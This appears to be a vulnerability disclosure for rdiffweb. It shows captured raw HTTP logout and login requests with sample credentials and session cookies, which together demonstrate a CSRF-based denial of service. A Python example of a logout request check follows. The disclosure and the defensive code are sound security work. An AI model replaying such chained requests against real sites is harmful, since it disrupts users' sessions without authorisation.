There is no CSRF token on logout. On its own this is not really an issue, but in rdiffweb we logically redirect the user back to the last source, as the logout method does.
In this case an attacker can chain two requests (logout, login), which leads to a DoS.
GET /logout HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: session_id=475774603a53b2967f21e2be80de38d1e37babce
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

POST /login/ HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/login/
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: http://127.0.0.1:8080
Connection: close
Cookie: session_id=0fc203ce03dac2a8cc4dafc1852b920643aa8e85
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
login=admin&password=admin123&submit=Sign+in
The response looks like this:
HTTP/1.1 303 See Other
Content-Type: text/html;charset=utf-8
Server: CherryPy/18.8.0
Date: Mon, 05 Dec 2022 06:40:58 GMT
X-Frame-Options: DENY
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Expires: 0
Referrer-Policy: same-origin
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Content-Security-Policy: default-src 'self'; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline'
Location: http://127.0.0.1:8080/
Content-Language: en_US
Vary: Accept-Encoding
Content-Length: 90
Set-Cookie: session_id=4e13178447f685e835b6f9c78fdd203b32f8048a; HttpOnly; Path=/; SameSite=Lax
Connection: close
This resource can be found at <a href="http://127.0.0.1:8080/">http://127.0.0.1:8080/</a>.
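As an added, framework-neutral example (not rdiffweb's own code), a check a logout handler could apply before ending the session: it rejects the captured GET /logout above because logout must be a POST, rejects a constructed cross-site POST, and accepts only a same-origin POST carrying the CSRF token bound to the session cookie. The session store, the token value and the two POST requests are constructed for the demonstration.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed session store: session_id -> CSRF token bound to that session.
SESSION_CSRF = {"475774603a53b2967f21e2be80de38d1e37babce": "tok-constructed-1"}

def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, headers dict, body)."""
    head, _, body = raw.strip("\n").partition("\n\n")
    lines = head.splitlines()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0].split()[0], headers, body

def logout_allowed(raw):
    """Return (allowed, reason): POST only, not cross-site, valid CSRF token."""
    method, headers, body = parse_request(raw)
    if method != "POST":
        return False, "logout must be POST, got " + method
    if headers.get("sec-fetch-site") == "cross-site":
        return False, "Sec-Fetch-Site reports cross-site"
    origin = headers.get("origin")
    if origin and urlsplit(origin).netloc != headers.get("host"):
        return False, "Origin does not match Host"
    cookies = dict(c.strip().split("=", 1)
                   for c in headers.get("cookie", "").split(";") if "=" in c)
    expected = SESSION_CSRF.get(cookies.get("session_id"))
    sent = parse_qs(body).get("csrf_token", [None])[0]
    if expected is None or sent != expected:
        return False, "missing or mismatched csrf_token"
    return True, "ok"

# Request 1 is the page's GET /logout, trimmed; 2 and 3 are constructed.
LOGOUT_GET = """GET /logout HTTP/1.1
Host: 127.0.0.1:8080
Cookie: session_id=475774603a53b2967f21e2be80de38d1e37babce
Sec-Fetch-Site: none
"""
CROSS_SITE_POST = LOGOUT_GET.replace("GET", "POST").replace(
    "Sec-Fetch-Site: none", "Origin: http://other.example\nSec-Fetch-Site: cross-site"
) + "\ncsrf_token=tok-constructed-1"
SAME_ORIGIN_POST = LOGOUT_GET.replace("GET", "POST").replace(
    "Sec-Fetch-Site: none", "Origin: http://127.0.0.1:8080\nSec-Fetch-Site: same-origin"
) + "\ncsrf_token=tok-constructed-1"
```

A browser sends Sec-Fetch-Site: none for a typed URL and cross-site for a navigation triggered from another origin, so the header check alone already blocks the chained request, and the token check covers clients that omit fetch metadata.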